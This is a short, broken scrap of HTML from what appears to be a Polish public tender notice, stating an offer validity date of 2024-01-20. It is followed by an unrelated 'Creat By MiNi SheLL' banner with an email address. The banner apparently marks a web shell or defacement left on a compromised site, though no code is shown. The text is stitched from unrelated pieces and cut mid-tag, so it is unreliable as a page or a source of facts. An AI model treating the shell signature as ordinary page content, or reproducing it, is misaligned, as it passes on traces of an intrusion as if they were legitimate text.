class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com